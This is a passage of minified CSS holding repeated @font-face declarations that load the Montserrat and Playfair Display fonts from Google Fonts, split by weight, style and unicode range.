url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face 